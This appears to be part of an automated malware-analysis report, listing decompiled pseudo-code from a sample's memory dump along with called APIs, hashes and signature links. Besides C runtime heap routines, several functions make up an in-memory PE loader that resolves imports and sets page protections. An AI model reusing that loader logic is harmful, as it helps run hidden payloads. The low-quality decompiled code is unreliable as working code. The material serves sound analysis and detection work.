										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

0x1001ab69
0x1001ab6c
0x1001ab6f
0x1001ab80
0x1001ab8a
0x1001ab9e
0x1001abac
0x1001abb2
0x1001abb8
0x1001abba
0x00000000
0x00000000
0x1001abc0
0x1001abc3
0x1001abc7
0x00000000
0x00000000
0x1001abd0
0x1001abe1
0x1001abe4
0x1001abe6
0x1001abe9
0x1001abec
0x1001abf0
0x1001ac09
0x1001ac13
0x1001ac17
0x1001ac1a
0x1001ac1b
0x1001ac20
0x1001ac23
0x1001ac26
0x1001ac2a
0x1001ac5c
0x1001ac62
0x1001ac68
0x1001ac6e
0x1001ac74
0x1001ac7d
0x1001ac83
0x1001ac86
0x1001acaa
0x1001acb3
0x1001acb3
0x1001acb6
0x1001ac88
0x1001ac90
0x1001ac9c
0x1001ac9c
0x1001accd
0x1001acd0
0x1001acd3
0x00000000
0x00000000
0x1001acda
0x1001ace0
0x1001ad12
0x1001ad18
0x1001ad1f
0x1001ad1f
0x1001ad2a
0x1001ad2d
0x1001ad2f
0x1001ad35
0x1001ace2
0x1001ace5
0x1001acfb
0x1001acfe
0x1001ad00
0x1001ad06
0x1001ad06
0x1001ad3a
0x1001ad3d
0x1001acc1
0x1001acc7
0x1001acc7
0x1001acca
0x00000000
0x1001ad3f
0x1001ad3f
0x00000000
0x1001ad3f
0x1001ad3d
0x1001ad4d
0x1001ad51
0x1001aba6
0x1001aba6
0x1001aba9
0x00000000
0x1001aba9
0x1001ad56
0x1001ad61
0x1001ad64
0x1001ad6b
0x00000000
0x1001ad6b
0x1001ac2f
0x1001ac3a
0x1001ac3d
0x1001ac44
0x1001ac4a
0x00000000
0x1001ac4a
0x1001abf4
0x1001abfa
0x00000000
0x1001abfa
0x00000000
0x1001ad78
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
SetLastError.KERNEL32(0000007E), ref: 1001ABF4

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000C9E0, Relevance: 6.1, APIs: 4, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t20;
				intOrPtr _t36;
				intOrPtr* _t38;

				 *__eax =  *__eax + __edx;
				 *0xba =  *0xba + __edx;
				asm("rol dh, 0x0");
				asm("adc [edx+edi*4], ah");
				 *0xba =  *0xba + __edx;
				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
				asm("adc dl, al");
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
				_t14 = _t38;
				 *_t14 =  *_t14 + __edx;
				 *_t14 =  *_t14 + __edx;
				_push(es);
				 *_t14 =  *_t14 + __edx;
				asm("repne rol byte [eax], 0x10");
				asm("adc eax, ebp");
				 *_t14 =  *_t14 + __edx;
				asm("adc [ebx-0x40], ah");
				 *_t14 =  *_t14 + __edx;
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103301c0);
				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
				_t36 =  *0x00000180;
				if(_t36 != 0) {
					if( *0x10335f3c != 3) {
						_push(_t36);
						goto L8;
					} else {
						L1000FA03(4);
						 *0x00000174 =  *0x00000174 & 0x00000000;
						_t20 = E1000FA7C(_t36);
						 *0x0000015C = _t20;
						if(_t20 != 0) {
							_push(_t36);
							_push(_t20);
							E1000FAA7();
						}
						 *0x00000174 = 0xfffffffe;
						_t15 = E1000CA86();
						if( *((intOrPtr*)(0x15c)) == 0) {
							_push( *((intOrPtr*)(0x180)));
							L8:
							_push(0);
							_t15 = RtlFreeHeap( *0x10333310); // executed
							_t47 = _t15;
							if(_t15 == 0) {
								_t17 = E1000F720(_t47);
								 *_t17 = E1000F6E5(GetLastError());
							}
						}
					}
				}
				return E10010579(_t15);
			}

0x1000c9e2
0x1000c9ea
0x1000c9ec
0x1000c9ef
0x1000c9f2
0x1000c9f6
0x1000c9f8
0x1000c9fa
0x1000c9fe
0x1000ca00
0x1000ca06
0x1000ca0e
0x1000ca10
0x1000ca16
0x1000ca18
0x1000ca1c
0x1000ca1e
0x1000ca27
0x1000ca2a
0x1000ca2f
0x1000ca30
0x1000ca32
0x1000ca37
0x1000ca3c
0x1000ca41
0x1000ca4a
0x1000ca8f
0x00000000
0x1000ca4c
0x1000ca4e
0x1000ca54
0x1000ca59
0x1000ca5f
0x1000ca64
0x1000ca66
0x1000ca67
0x1000ca68
0x1000ca6e
0x1000ca6f
0x1000ca76
0x1000ca7f
0x1000ca81
0x1000ca90
0x1000ca90
0x1000ca98
0x1000ca9e
0x1000caa0
0x1000caa2
0x1000cab5
0x1000cab7
0x1000caa0
0x1000ca7f
0x1000ca4a
0x1000cabd

APIs

___sbh_find_block.LIBCMT ref: 1000CA59
___sbh_free_block.LIBCMT ref: 1000CA68
RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
Instruction ID: f3614e2ed5c3b7a2523f888baaf654e085a5ac9fd5a4e10f0babc6e667b4755f
Opcode Fuzzy Hash: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
Instruction Fuzzy Hash: D921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA30, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103301c0);
				_t8 = E10010534(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10010579(_t8);
				}
				if( *0x10335f3c != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10333310); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F720(_t31);
						 *_t10 = E1000F6E5(GetLastError());
					}
					goto L9;
				}
				L1000FA03(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FA7C(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FAA7();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA86();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x1000ca30
0x1000ca32
0x1000ca37
0x1000ca3c
0x1000ca41
0x1000cab8
0x1000cabd
0x1000cabd
0x1000ca4a
0x1000ca8f
0x1000ca90
0x1000ca90
0x1000ca98
0x1000ca9e
0x1000caa0
0x1000caa2
0x1000cab5
0x1000cab7
0x00000000
0x1000caa0
0x1000ca4e
0x1000ca54
0x1000ca59
0x1000ca5f
0x1000ca64
0x1000ca66
0x1000ca67
0x1000ca68
0x1000ca6e
0x1000ca6f
0x1000ca76
0x1000ca7f
0x00000000
0x1000ca81
0x1000ca81
0x00000000
0x1000ca81

APIs

___sbh_find_block.LIBCMT ref: 1000CA59
___sbh_free_block.LIBCMT ref: 1000CA68
RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
Instruction ID: 10b30a0b1b21ab9b25203a3b4f1cd3614836a259c78c12a13bfb3de2cf880016
Opcode Fuzzy Hash: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
Instruction Fuzzy Hash: 94016775B0131A9AFB10DBB49C46B5E76A4DF013E5F104109F5049A0D5CF38A940DF56

Uniqueness

Uniqueness Score: -1.00%

Function 1000CE64, Relevance: 4.6, APIs: 3, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000CE64(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				void* _t2;
				void* _t6;
				void* _t10;
				void* _t12;
				void* _t18;
				void* _t20;
				void* _t22;
				intOrPtr _t24;
				void* _t28;
				void* _t30;
				void* _t32;

				_t18 = __edx;
				_t12 = HeapAlloc;
				do {
					_t32 =  *0x10333310; // 0xbb0000
					_t20 = _t30;
					if(_t32 == 0) {
						E100119E6(_t12, _t18, _t20, _t32);
						E10011846(0x1e);
						E100115A8(0xff);
					}
					_t1 =  *0x10335f3c; // 0x1
					if(_t1 != 1) {
						__eflags = _t1 - 3;
						if(__eflags != 0) {
							L10:
							__eflags = _t30;
							if(_t30 == 0) {
								_t20 = 1;
								__eflags = 1;
							}
							_t22 = _t20 + 0x0000000f & 0xfffffff0;
							__eflags = _t22;
							_push(_t22);
							goto L13;
						} else {
							_push(_t30);
							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
							__eflags = _t2;
							if(__eflags == 0) {
								goto L10;
							}
						}
					} else {
						if(_t30 == 0) {
							_t10 = 1;
							__eflags = 1;
						} else {
							_t10 = _t30;
						}
						_push(_t10);
						L13:
						_push(0);
						_t2 = RtlAllocateHeap( *0x10333310); // executed
					}
					_t28 = _t2;
					if(_t28 == 0) {
						_t24 = 0xc;
						if( *0x103337d4 == _t2) {
							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
							L19:
							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
						} else {
							goto L16;
						}
					}
					return _t28;
					L16:
					_t6 = E100108CA(_t30);
					_t37 = _t6;
				} while (_t6 != 0);
				goto L19;
			}

0x1000ce64
0x1000ce65
0x1000ce6d
0x1000ce6f
0x1000ce75
0x1000ce77
0x1000ce79
0x1000ce80
0x1000ce8a
0x1000ce90
0x1000ce91
0x1000ce99
0x1000cea9
0x1000ceac
0x1000ceb9
0x1000ceb9
0x1000cebb
0x1000cebf
0x1000cebf
0x1000cebf
0x1000cec3
0x1000cec3
0x1000cec6
0x00000000
0x1000ceae
0x1000ceae
0x1000ceaf
0x1000ceb4
0x1000ceb7
0x00000000
0x00000000
0x1000ceb7
0x1000ce9b
0x1000ce9d
0x1000cea5
0x1000cea5
0x1000ce9f
0x1000ce9f
0x1000ce9f
0x1000cea6
0x1000cec7
0x1000cec7
0x1000cece
0x1000cece
0x1000ced0
0x1000ced4
0x1000cede
0x1000cedf
0x1000cef3
0x1000cef5
0x1000cefa
0x00000000
0x00000000
0x00000000
0x1000cedf
0x1000cf02
0x1000cee1
0x1000cee2
0x1000cee7
0x1000cee9
0x00000000

APIs

__FF_MSGBANNER.LIBCMT ref: 1000CE79

Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17

__NMSG_WRITE.LIBCMT ref: 1000CE80

Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A

Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6

Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F

RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
String ID:
API String ID: 3791426274-0
Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1

Uniqueness

Uniqueness Score: -1.00%

Function 1001B1C0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1001B1C0(intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				int _t67;

				if(_a8[2] != 0) {
					_t4 =  &(_a8[3]); // 0x1
					if(( *_t4 & 0x02000000) == 0) {
						_t31 =  &(_a8[3]); // 0x1
						asm("sbb edx, edx");
						_v16 =  ~( ~( *_t31 & 0x20000000));
						_t34 =  &(_a8[3]); // 0x1
						asm("sbb ecx, ecx");
						_v24 =  ~( ~( *_t34 & 0x40000000));
						_t37 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v12 =  ~( ~( *_t37 & 0x80000000));
						_t42 = _v24 * 8; // 0x2034e6cd
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103330c4 + _v12 * 4));
						_t49 =  &(_a8[3]); // 0x1
						if(( *_t49 & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t55 =  &(_a8[2]); // 0xb805ebc0
						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							_push("Error protecting memory page");
							E1001AE60(_t67);
							return 0;
						}
					}
					_t7 =  &(_a8[1]); // 0x330475c0
					if( *_a8 !=  *_t7) {
						L8:
						return 1;
					}
					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L7:
						_t26 =  &(_a8[2]); // 0xb805ebc0
						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
						goto L8;
					} else {
						_t16 =  &(_a8[2]); // 0xb805ebc0
						if( *_t16 %  *(_a4 + 0x3c) != 0) {
							goto L8;
						}
						goto L7;
					}
				}
				return 1;
			}

0x1001b1cd
0x1001b1dc
0x1001b1e5
0x1001b250
0x1001b25b
0x1001b25f
0x1001b265
0x1001b270
0x1001b274
0x1001b27a
0x1001b284
0x1001b288
0x1001b294
0x1001b2a1
0x1001b2a7
0x1001b2b0
0x1001b2bb
0x1001b2bb
0x1001b2c9
0x1001b2d3
0x1001b2db
0x00000000
0x1001b2dd
0x1001b2dd
0x1001b2e2
0x00000000
0x1001b2ea
0x1001b2db
0x1001b1ef
0x1001b1f2
0x1001b243
0x00000000
0x1001b243
0x1001b1fb
0x1001b21f
0x1001b22e
0x1001b23e
0x00000000
0x1001b20d
0x1001b213
0x1001b21d
0x00000000
0x00000000
0x00000000
0x1001b21d
0x1001b1fb
0x00000000

Strings

Error protecting memory page, xrefs: 1001B2DD

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: Error protecting memory page
API String ID: 0-1748499907
Opcode ID: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
Instruction ID: 8d650c0da19698877930e2c5171e1c21c57976ae84b1b649a9511697b3bf2f19
Opcode Fuzzy Hash: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
Instruction Fuzzy Hash: EB41D774A005099FD748DF58C490BA9B3B2FB88310F14C259EC1A8F355C731EE85CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000F7BF, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F7BF(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10333310 = _t6;
				if(_t6 != 0) {
					_t7 = E1000F764(__eflags);
					__eflags = _t7 - 3;
					 *0x10335f3c = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1000FA34(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10333310);
							 *0x10333310 =  *0x10333310 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x1000f7d0
0x1000f7d8
0x1000f7dd
0x1000f7e2
0x1000f7e7
0x1000f7ea
0x1000f7ef
0x1000f815
0x1000f817
0x1000f818
0x1000f7f1
0x1000f7f6
0x1000f7fb
0x1000f7fe
0x00000000
0x1000f800
0x1000f806
0x1000f80c
0x00000000
0x1000f80c
0x1000f7fe
0x1000f7df
0x1000f7df
0x1000f7e1
0x1000f7e1

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
HeapDestroy.KERNEL32 ref: 1000F806

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01

Uniqueness

Uniqueness Score: -1.00%

Function 1001A960, Relevance: 2.6, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001A960(void* _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				void* _t49;
				void* _t52;
				intOrPtr _t60;
				void* _t68;
				void* _t70;
				signed int _t76;
				signed int _t87;
				signed int _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t49 = _a4;
				_v8 = _t49;
				if(_v8 != 0) {
					__eflags =  *(_v8 + 0x10);
					if(__eflags != 0) {
						_t9 =  *_v8 + 0x28; // 0x1ab2068
						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
						__eflags = _t93;
						_v12 = _t93;
						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
					}
					_push( *((intOrPtr*)(_v8 + 0x30)));
					E1000CA30(_t68, _t94, _t95, __eflags);
					_t97 = _t96 + 4;
					_t70 = _v8;
					__eflags =  *(_t70 + 8);
					if( *(_t70 + 8) == 0) {
						L12:
						_t52 = _v8;
						__eflags =  *(_t52 + 4);
						if( *(_t52 + 4) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
						}
						return HeapFree(GetProcessHeap(), 0, _v8);
					} else {
						_v16 = 0;
						while(1) {
							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
							if(__eflags >= 0) {
								break;
							}
							_t60 =  *((intOrPtr*)(_v8 + 8));
							_t76 = _v16;
							__eflags =  *(_t60 + _t76 * 4);
							if( *(_t60 + _t76 * 4) != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
								_t97 = _t97 + 8;
							}
							_t87 = _v16 + 1;
							__eflags = _t87;
							_v16 = _t87;
						}
						_push( *((intOrPtr*)(_v8 + 8)));
						E1000CA30(_t68, _t94, _t95, __eflags);
						_t97 = _t97 + 4;
						goto L12;
					}
				}
				return _t49;
			}

0x1001a966
0x1001a969
0x1001a970
0x1001a97a
0x1001a97e
0x1001a98b
0x1001a98b
0x1001a98b
0x1001a98e
0x1001a99c
0x1001a99c
0x1001a9a5
0x1001a9a6
0x1001a9ab
0x1001a9ae
0x1001a9b1
0x1001a9b5
0x1001aa13
0x1001aa13
0x1001aa16
0x1001aa1a
0x1001aa37
0x1001aa39
0x00000000
0x1001a9b7
0x1001a9b7
0x1001a9c9
0x1001a9cf
0x1001a9d2
0x00000000
0x00000000
0x1001a9d7
0x1001a9da
0x1001a9dd
0x1001a9e1
0x1001a9fd
0x1001a9ff
0x1001a9ff
0x1001a9c3
0x1001a9c3
0x1001a9c6
0x1001a9c6
0x1001aa0a
0x1001aa0b
0x1001aa10
0x00000000
0x1001aa10
0x1001a9b5
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA3C), ref: 1001AA42
HeapFree.KERNEL32(00000000,?,?,1001BA3C), ref: 1001AA49

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
Instruction ID: 4d02d4e2172aadf48441733df7480d9fc57cbb1c8efede5bdbb7e0f8d5fbe0c0
Opcode Fuzzy Hash: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
Instruction Fuzzy Hash: B431A178A00108EFDB04DF94CA94AADB7B6FF89304F248198E9055B395C775EE85DB81

Uniqueness

Uniqueness Score: -1.00%

Function 1001ABA3, Relevance: 2.5, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001ABA3() {
				signed int _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t106;
				signed int _t114;
				void* _t116;
				void* _t121;
				void* _t127;
				signed int _t173;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				L0:
				while(1) {
					L0:
					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
					_t186 = _t184 + 8;
					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
						_push(4 +  *_t17 * 4);
						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
						_push( *_t21);
						_t99 = E1000E018(_t127,  *_t21, _t180, _t181, __eflags);
						_t187 = _t186 + 8;
						 *(_t182 - 0x18) = _t99;
						__eflags =  *(_t182 - 0x18);
						if( *(_t182 - 0x18) != 0) {
							L7:
							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
